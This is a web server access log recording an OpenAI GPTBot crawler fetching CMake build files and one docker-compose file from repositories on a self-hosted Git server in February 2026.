"/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14303] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16189] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13528] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16923] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11278] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11262] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13300] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16051] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10072] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 